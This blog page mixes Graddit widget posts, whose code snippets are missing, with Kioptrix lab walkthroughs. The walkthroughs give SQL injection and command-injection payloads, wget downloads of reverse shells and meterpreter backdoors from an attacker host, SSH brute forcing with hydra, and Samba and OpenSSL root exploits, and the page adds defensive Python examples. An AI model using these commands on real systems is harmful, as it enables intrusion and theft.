Posted by wanasta
Friday, 21 September 2012
0 comments
Blogger Dynamic Views are cool, but they support only a few official widgets. Today we're hacking Dynamic Views to support any custom widget (using the Graddit widget as an example, of course).
Disclaimer. This is dirty hacking, it can stop working at any time and can even negatively affect behaviour of your blog. You were warned.
So, the goal is to make widgets appear when a user expands a post in any view (Classic, Flipcard, Magazine, Mosaic, Sidebar, Snapshot and Timeline).
First, open the Blogger dashboard and go to the Template tab; click Edit HTML and then the Proceed button.
For Dynamic Views we can't change the part of the template that displays posts; it will not work. But we can still change the head section. Add the following lines to <head>...</head>:
These are styles and some cool scripts. Actually, we will need only one function, called gradditBloggerDynamicViewsRatingsHack. Now go to the very bottom of the template and add this call just before the closing </body> tag:
Now save the template and close the editor. Click the Customize button to add some styles (without them the stars will not show properly). Select Advanced and then click Add CSS. Add this:
Posted by wanasta
Sunday, 16 September 2012
1 comment
Graddit presents new widgets for polls that you can build into your blogs and sites. Here's a simple poll example:
{[['Bad',' | '],['Average',' | '],['Awesome']]}
The number of options and the text can be changed. Take the code from the Graddit page; options are set like this:
{[['Bad',' | '],['Average',' | '],['Awesome']]}, where ' | ' are the separators between options; the number of options should match the number that is passed to the script as a parameter (3 in this example).
It can be not just text but any valid HTML element. For example, images:
Who rocks?
{[['',' '], ['',' '], ['']]}
And of course general polls. How do you like the new widgets?
Posted by wanasta
Monday, 03 September 2012
0 comments
There's a new tab in the admin panel called "Statistics" that lets you see detailed data about ratings, views, votes and feedback counts. You can also get some interesting details such as Google PageRank, Alexa Rank, and Facebook and Twitter mentions (this will be extended later). Here's the tab screenshot:
It's sortable. To get information about a page, click the corresponding ⟳ link. Leave your suggestions here in the comments.
Posted by wanasta
Sunday, 19 August 2012
0 comments
Hi everyone, in this post I will explain how to get root on Kioptrix Level 2. Let's start with the basics: nmap!

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-13 10:30 BST
Nmap scan report for 172.16.1.189
Host is up (0.021s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  (rpcbind V2) 2 (rpc #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:50:56:AF:62:3F (VMware)

OK, so for this one, let's try to access Apache on that IP address. Open your browser and type the IP address of your Kioptrix machine; in my case it is http://172.16.1.189. As you can see there is a login web page. We don't know the user/password, but we can guess, OR try a SQL injection. In my case I am doing the SQL injection, so in the username field type: admin, and in the password field type: ' OR 1=1 -- -

If you want to dig a bit more on the SQL injection side of things, we can use sqlmap to fetch some information from the database. Here are some examples:

1) Available databases:
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --dbs
Result:
available databases [2]:
[*] `test\_%`
[*] test

2) Identify the current database:
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --current-db
Result:
current database: 'webapp'

3) Find all MySQL users' passwords:
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --passwords
Result:
[*] john [1]:
password hash: 5a6914ba69e02807
[*] root [1]:
password hash: 5a6914ba69e02807

And so on. You can also have a SQL shell on the server if you want.
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --sql-shell
> select * from users;
[2]:
[*] 1, 5afac8d85f, admin
[*] 2, 66lajGGbla, john
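Why the login form falls to ' OR 1=1 -- -, and what the fix looks like, as an added example that is not part of the original post and not Kioptrix's own code. The users table, its rows and the column layout are constructed for this example (the real application is PHP/MySQL; SQLite is used here so the snippet runs offline), and the vulnerable function reproduces the string-built query pattern the walkthrough exploits next to its parameterised replacement.

```python
import sqlite3

INJECTION = "' OR 1=1 -- -"   # the password-field payload used in the walkthrough


def make_db():
    # Constructed stand-in for the "webapp" users table; rows are sample data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "s3cret-admin", "admin"), (2, "s3cret-john", "john")])
    return conn


def login_vulnerable(conn, uname, psw):
    # String-built query: the quote in psw closes the literal, "OR 1=1" makes
    # the WHERE clause always true, and "-- -" comments out the trailing quote.
    sql = (f"SELECT username FROM users "
           f"WHERE username='{uname}' AND password='{psw}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, uname, psw):
    # Parameterised query: the driver binds the values, so the same payload is
    # compared as a literal password string and simply fails to match.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (uname, psw)).fetchone()
    return row[0] if row else None


def compare(uname="admin", psw=INJECTION):
    """Run the same credentials through both login paths."""
    conn = make_db()
    return {"vulnerable": login_vulnerable(conn, uname, psw),
            "safe": login_safe(conn, uname, psw)}


if __name__ == "__main__":
    print(compare())            # {'vulnerable': 'admin', 'safe': None}
    print(compare("john", "s3cret-john"))
```

The vulnerable path returns the first row of the table regardless of the password (which is why the walkthrough lands as "admin"); the parameterised path only succeeds with the real credentials. Binding parameters, not escaping, is the fix: the database never parses user input as SQL.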
Now, coming back to the browser, you can see a new web page saying that you can ping a machine on the network. That means we can execute commands and, if it is not properly configured, we can run more than just "ping". Let's try ping first, then we can try something else. If you typed your IP address in that box, you will be forwarded to http://172.16.1.189/pingit.php. That's the one we need to look at now. So, instead of just a ping, let's try to add something else to the command, like "; cat /etc/passwd", and see what happens. As you can see, we can read /etc/passwd, which means we have a web shell on the server and now we can execute anything (almost ;) ), so let's upload our backdoor to the server. We can do this in many ways; I will explain two methods.

1) Upload a reverse shell (the easiest way):
172.16.1.1 ; wget -O /tmp/reverse_shell http://172.16.1.79/exploits/reverse_shell2
2) Change permissions to execute:
172.16.1.1 ; chmod 777 /tmp/reverse_shell
3) Prepare your BT server for the connection:
nc -l -p 10000
4) And now run the reverse_shell:
172.16.1.1 ; /tmp/reverse_shell

Done, now we have a shell. We can try the same using BackTrack.
1) We need to start Apache:
/etc/init.d/apache2 start
2) We need to create our backdoor:
LHOST: IP of your BackTrack
LPORT: port that BackTrack will be listening on
/var/www/backdoor.php.txt: that's where it will save your backdoor.
So the complete command is:
msfpayload php/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8080 R > /var/www/backdoor.php.txt
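The pingit.php weakness is classic OS command injection: a form field is glued onto a shell command line, so "; cat /etc/passwd" becomes a second command. The following is an added example, not code from the original post or from Kioptrix, showing the vulnerable pattern beside a hardened handler. Function names, the ping argument list and the error type are my own; the hardened version relies on two things, an allow-list check that the field parses as an IP address and passing it as a single argv element with no shell involved.

```python
import ipaddress
import subprocess


class UnsafeHostError(ValueError):
    """Raised when the submitted host field is not a plain IP address."""


def vulnerable_command(user_input):
    # The pingit.php pattern: user text concatenated into a shell line.
    # With "172.16.1.1 ; cat /etc/passwd" the shell runs two commands.
    return "ping -c 1 " + user_input


def parse_target(user_input):
    # Strict allow-list: the field must parse as an IPv4/IPv6 address.
    # Metacharacters (; | & ` $ newline) can never survive this check.
    text = user_input.strip()
    try:
        return str(ipaddress.ip_address(text))
    except ValueError:
        raise UnsafeHostError(f"rejected host field: {user_input!r}") from None


def is_acceptable(user_input):
    """True if the field would be passed on to ping, False if rejected."""
    try:
        parse_target(user_input)
        return True
    except UnsafeHostError:
        return False


def safe_argv(user_input):
    # The validated address travels as one argv element with no shell in
    # between, so the kernel hands ping exactly one host argument.
    return ["ping", "-c", "1", parse_target(user_input)]


def run_ping(user_input):
    # shell=False (the default when a list is given) is the part that matters;
    # the validated value is an argument, never re-parsed as a command line.
    proc = subprocess.run(safe_argv(user_input), capture_output=True, text=True)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    for field in ("172.16.1.1", "172.16.1.1 ; cat /etc/passwd"):
        print(field, "->", "accepted" if is_acceptable(field) else "rejected")
```

On the detection side, a web server log where the ping form's parameter contains ";", "|", "&&" or "wget" is the signature of exactly what this post does; on the hardening side, the web server account should also not be able to write and execute files under /tmp, which is what the reverse-shell upload step depends on.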
Now, we need to start our session handler.
msfconsole
use multi/handler
search php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 8080
exploit -j -z

Leave this one running and open another shell on your BackTrack. We need to edit our backdoor.php.txt (script kid stuff): vi /var/www/backdoor.php.txt. Remove the "#" from the first line and save it.

The next step is to insert this in our ping command line:
172.16.1.1 ; cd /tmp ; wget -O backdoor.php 172.16.1.79/backdoor.php.txt ; php -f backdoor.php
If you look in that other shell, you should be reading this by now:
[*] Sending stage (39217 bytes) to 172.16.1.189
[*] Meterpreter session 4 opened (172.16.1.79:8080 -> 172.16.1.189:32807) at 2012-08-13 14:12:00 +0100
meterpreter >
Great, now that we have access to the box, we need to get root.
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Or... you can search inside BackTrack:
/pentest/exploits/exploitdb/searchsploit kernel linux local
And that's the one you are looking for:
Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit /linux/local/9435.txt
Again, you can try other exploits as well. Now that you have the exploit, compile it and run it on the target machine.
wget http://172.16.1.79/exploits/ip_append_data.c
gcc -o get_root ip_append_data.c
./get_root
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
Posted by wanasta
Sunday, 12 August 2012
0 comments
Hi folks. OK, another option we have to break into Kioptrix Level 1 is to brute-force SSH. It's quite simple, but it takes a LOT of time if you are unlucky. Here is how you can crack it via brute force. In your BackTrack type:
cd /pentest/passwords/wordlists/
hydra -l root -P rockyou.txt -t 3 -o login.pwd 172.16.1.144 ssh
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-08 13:33:19
[DATA] 3 tasks, 1 server, 14344398 login tries (l:1/p:14344398), ~4781466 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 172.16.1.144 login: root password: 123456
[STATUS] attack finished for 172.16.1.144 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-08 13:33:36
As you can see, it found the password 123456 for the user root.
PS : I changed the root password to 123456 for this demonstration only.
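What this attack looks like from the target's side, as an added example that is not part of the original post: sshd logs every failed and accepted password attempt, so a burst of failures from one source followed by an "Accepted" line is the whole story in a few log lines. The auth-log sample below is constructed (host name, PIDs, addresses and times are made up, mirroring the hydra run above); the regex follows the classic syslog format OpenSSH writes on RHEL/CentOS-era hosts, and the threshold and report layout are my own choices.

```python
import re
from collections import defaultdict

# Constructed sample of sshd auth-log lines (syslog format); host name, PIDs,
# addresses and times are made up for this example.
SAMPLE_AUTH_LOG = """\
Aug  8 13:33:19 kioptrix sshd[2101]: Failed password for root from 172.16.1.79 port 40001 ssh2
Aug  8 13:33:19 kioptrix sshd[2102]: Failed password for root from 172.16.1.79 port 40002 ssh2
Aug  8 13:33:20 kioptrix sshd[2103]: Failed password for root from 172.16.1.79 port 40003 ssh2
Aug  8 13:33:21 kioptrix sshd[2104]: Failed password for root from 172.16.1.79 port 40004 ssh2
Aug  8 13:33:22 kioptrix sshd[2105]: Failed password for root from 172.16.1.79 port 40005 ssh2
Aug  8 13:33:24 kioptrix sshd[2106]: Failed password for root from 172.16.1.79 port 40006 ssh2
Aug  8 13:33:30 kioptrix sshd[2107]: Failed password for root from 172.16.1.79 port 40007 ssh2
Aug  8 13:33:36 kioptrix sshd[2108]: Accepted password for root from 172.16.1.79 port 40008 ssh2
Aug  8 13:40:02 kioptrix sshd[2150]: Failed password for invalid user bob from 10.0.0.5 port 51000 ssh2
Aug  8 13:45:10 kioptrix sshd[2177]: Accepted publickey for alice from 10.0.0.9 port 52000 ssh2
"""

LINE_RE = re.compile(
    r"^\w{3}\s+\d+ \d\d:\d\d:\d\d \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_events(log_text):
    """Return one dict per recognised sshd authentication line."""
    return [m.groupdict() for m in map(LINE_RE.match, log_text.splitlines()) if m]


def brute_force_report(log_text, threshold=5):
    """Per source IP: number of failed logins, plus any users whose login
    succeeded from that IP after failures (the guess-until-it-hits case).
    Only sources with at least `threshold` failures are reported."""
    failures = defaultdict(int)
    success_after = defaultdict(list)
    for ev in parse_events(log_text):
        if ev["result"] == "Failed":
            failures[ev["ip"]] += 1
        elif failures.get(ev["ip"], 0) > 0:
            success_after[ev["ip"]].append(ev["user"])
    return {ip: {"failures": n, "success_after_failures": success_after.get(ip, [])}
            for ip, n in failures.items() if n >= threshold}


if __name__ == "__main__":
    for ip, info in brute_force_report(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

The single failed attempt from 10.0.0.5 stays below the threshold and is not reported, while 172.16.1.79 is flagged with seven failures and a subsequent success as root, which is the event worth paging on. The mitigations are the usual ones: PermitRootLogin no, key-based authentication, and a rate limiter or fail2ban-style blocker fed by exactly these log lines.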
Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA)

Hi everyone, this is the second part of Level 1; now we are going to exploit Samba. As you remember from the last video, we managed to get root using an SSL exploit for Apache; now it's time to exploit a Samba vulnerability. So, let's start. First, let's run an nmap:
nmap -sV 172.16.1.144
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-07 11:12 BST
Nmap scan report for 172.16.1.144
Host is up (0.00068s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd (workgroup: MYGROUP)
MAC Address: 00:50:56:AF:5A:B9 (VMware)
OK, this output doesn't tell us the version of Samba, but we can try two commands to list the version:
1) smbclient -L 172.16.1.144
Result:
Enter root's password:
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

Sharename Type Comment
--------- ---- -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport
IPC$ IPC IPC Service (Samba Server)
ADMIN$ Disk IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

2) smbclient //172.16.1.144/IPC$
Result:
Enter root's password:
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
tree connect failed: ERRnosuchshare

OK, now we know it's running version 2.2.1a; let's try to find an exploit for it. If you google for "samba 2.2.1a" exploit, you will find this exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
So... let's go back to our BackTrack, download and compile it.
wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
gcc -o exploit 0x333hate.c
./exploit -t 172.16.1.144
Result:
[~] 0x333hate => samba 2.2.x remote root exploit [~]
[~] coded by c0wboy ~ www.0x333.org [~]
[-] connecting to 172.16.1.144:139
[-] stating bruteforce
[-] testing 0xbfffffff
[-] testing 0xbffffdff
[-] testing 0xbffffbff
[-] testing 0xbffff9ff
[-] testing 0xbffff7ff
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

There is another way to exploit this Samba, using Metasploit. Let's try that.
msfconsole
search samba
use linux/samba/trans2open
show options
set RHOST 172.16.1.144
show payloads
set PAYLOAD linux/x86/shell/bind_tcp
show options
exploit
[*] Started bind handler
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 172.16.1.144
[*] Trying return address 0xbffff9fc...
[*] Command shell session 1 opened (172.16.1.79:52832 -> 172.16.1.144:4444) at 2012-08-07 11:51:46 +0100
id
uid=0(root) gid=0(root) groups=99(nobody)
Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)

Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1. But what is Kioptrix? It's a Linux distro with lots of vulnerabilities, so we can play and test our knowledge. To download it, go to http://www.kioptrix.com/blog/?page_id=135 and use VMware Player to open the files, and you are ready to go. So, now that everything is up and running, we need to discover the IP address of the target machine, because it gets one via DHCP from your network (by the way, you need a DHCP server in order for this to work). To find out the IP address, let's run an nmap on our network that will look for live hosts.
# nmap -sn 172.16.1.0/24
Nmap scan report for 172.16.1.144
Host is up (0.0010s latency).
MAC Address: 00:50:56:AF:5A:B9 (VMware)

Great, now that we have found the IP address, let's see what's running on the host.
# nmap -sV 172.16.1.144
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-03 16:47 BST
Nmap scan report for 172.16.1.144
Host is up (0.033s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      (status V1) 1 (rpc #100024)
MAC Address: 00:50:56:AF:5A:B9 (VMware)

OK, at this point there is a lot to do. We need to find out whether the version running on each open port has a known exploit. To get the proper version and vulnerability IDs, let's use nikto to scan the host. I am not going to explain all the vulnerabilities of the distro; I think two are good enough, and you can try other ways to break in for yourselves. So I am going to show how to break in using Apache and Samba.
1) cd /pentest/web/nikto/
2) ./nikto.pl -host 172.16.1.144
3) The results (the interesting bits):
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
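Both Level 1 posts (the Samba 2.2.1a banner from smbclient and the Apache/mod_ssl banner from nmap and nikto here) come down to one defensive task: read a version out of a service banner and compare it against the fixed version in an advisory. The following is an added example, not code from the original posts or from Kioptrix, that does exactly that. The Apache and mod_ssl rows restate the nikto findings above; the Samba row (2.2.x below 2.2.8a affected by the trans2open overflow) is a threshold supplied by me rather than taken from the walkthrough. The banner patterns, the version tuple layout and the function names are my own; the input text is constructed from the scan output quoted above.

```python
import re


def parse_version(text):
    """'1.3.20' -> (1, 3, 20, ''), '2.2.1a' -> (2, 2, 1, 'a'); padded to three
    numeric fields so tuples of different lengths compare sanely."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    nums = [int(n) for n in m.group(1).split(".")]
    nums += [0] * (3 - len(nums))
    return tuple(nums[:3]) + (m.group(2),)


# (component, affected from, fixed in, note). The Apache and mod_ssl rows
# restate the nikto findings on the page. The Samba row is supplied for this
# example (assumption, not from the walkthrough): trans2open was fixed in 2.2.8a.
ADVISORIES = [
    ("Apache httpd", "1.3", "1.3.27",
     "Apache 1.3 below 1.3.27: local buffer overflow (CAN-2002-0839, OSVDB-4552)"),
    ("Apache httpd", "1.3", "1.3.29",
     "Apache 1.3 below 1.3.29: overflows in mod_rewrite and mod_cgi (CAN-2003-0542, OSVDB-2733)"),
    ("mod_ssl", "0", "2.8.8",
     "mod_ssl 2.8.7 and lower: remote buffer overflow (CVE-2002-0082, OSVDB-756)"),
    ("Samba", "2.2", "2.2.8a",
     "Samba 2.2.x below 2.2.8a: trans2open remote overflow"),
]

# Banner shapes seen in the walkthrough: nmap's "Apache httpd 1.3.20", nikto's
# "Server: Apache/1.3.20", "mod_ssl/2.8.4" and smbclient's "Server=[Samba 2.2.1a]".
BANNER_PATTERNS = {
    "Apache httpd": re.compile(r"Apache(?: httpd |/)(\d[\w.]*)"),
    "mod_ssl": re.compile(r"mod_ssl/(\d[\w.]*)"),
    "Samba": re.compile(r"Samba (\d[\w.]*)"),
}


def extract_components(text):
    """All distinct (component, version) pairs found in the banner text."""
    found = set()
    for name, pat in BANNER_PATTERNS.items():
        for m in pat.finditer(text):
            found.add((name, m.group(1)))
    return sorted(found)


def triage(text):
    """Match every extracted component against ADVISORIES; a finding is
    (component, version, note) for each advisory whose range contains it."""
    findings = []
    for name, version in extract_components(text):
        v = parse_version(version)
        for comp, lo, hi, note in ADVISORIES:
            if comp == name and parse_version(lo) <= v < parse_version(hi):
                findings.append((name, version, note))
    return findings


# Constructed from the Kioptrix Level 1 nmap and smbclient output quoted above.
KIOPTRIX1_BANNERS = """\
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
"""

if __name__ == "__main__":
    for name, version, note in triage(KIOPTRIX1_BANNERS):
        print(f"{name} {version}: {note}")
```

Run on the Level 1 banners this yields four findings, one per advisory row, which is the same conclusion nikto and the smbclient version string led the author to; patched versions such as Apache 1.3.29 with mod_ssl 2.8.8, or Samba 2.2.8a, produce none. The letter suffix matters for Samba ("2.2.8" is still affected, "2.2.8a" is not), which is why the version tuple keeps it as a separate, last element.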
Right, now we need to google the CVEs, or you can search for the exploit on BackTrack itself. Run:
/pentest/exploits/exploitdb/searchsploit apache linux remote
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl /linux/remote/38.pl
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit /linux/remote/132.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c) /linux/remote/764.c
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield) /linux/remote/4162.c
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) /linux/remote/4552.pl
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt

As you can see, there is one for OpenSSL (764.c), OpenFuck. Now, because this is really old, you need to change the exploit a bit in order to make it work.
1) Add: #include <openssl/rc4.h>
2) Add: #include <openssl/md5.h>
3) Search inside the exploit for "wget" and change the URL to the correct one, because that one is not valid anymore. If you google for ptrace-kmod.c, you will find that the correct address is http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c. So just change that in the exploit and save it.
Now we need to compile it, but before that we need to install the SSL dev libraries. Run:
apt-get install libssl-dev
cd /pentest/exploits/exploitdb/platforms/linux/remote
gcc -o OpenFuck 764.c -lcrypto
Run the exploit now:
./OpenFuck
Look for the target. We know that it's running Apache 1.3.20 on a Red Hat, so let's filter for that:
./OpenFuck | grep -i redhat | grep "1.3.20"
That limits the results to only two:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
So we can try 0x6a first as the target, and if that doesn't work we can try 0x6b.
./OpenFuck 0x6a 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80fc3f0
Ready to send shellcode
Spawning shell...
Good Bye!

As you can see, that did not work. Let's try the other one now.
./OpenFuck 0x6b 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f83c0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; ttp://172.16.1.79/ptrace-kmod.c; gcc - --09:18:29-- http://172.16.1.79/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 172.16.1.79:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 17426
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Success! We got root on the box. In the next video I will demonstrate how to hack using Samba.